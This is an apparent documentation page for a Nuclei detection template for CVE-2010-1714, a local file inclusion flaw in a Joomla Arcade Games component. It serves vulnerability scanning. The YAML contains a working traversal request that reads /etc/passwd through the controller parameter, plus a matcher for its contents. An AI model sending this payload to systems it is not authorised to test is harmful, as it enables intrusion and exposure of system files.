Joomla! Component Arcade Games 1.0 - Local File Inclusion
ID: CVE-2010-1714
Severity: medium
Author: daffainfo
Tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk
Description
Section titled “Description”A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-1714
info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. remediation: | Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component. reference: - https://www.exploit-db.com/exploits/12168 - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt - http://www.vupen.com/english/advisories/2010/0860 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 epss-percentile: 0.86649 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dev.pucit.edu.pk product: com_arcadegames tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402206c2f211569d09503b7e7d5898a76cbf3f74358ac719a39b70b3ab285aae640e902201d479b1e75dde5d26fc9eeae6cece415f380bbd17a99ccc99e27ec025c8df57c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-1714.yaml"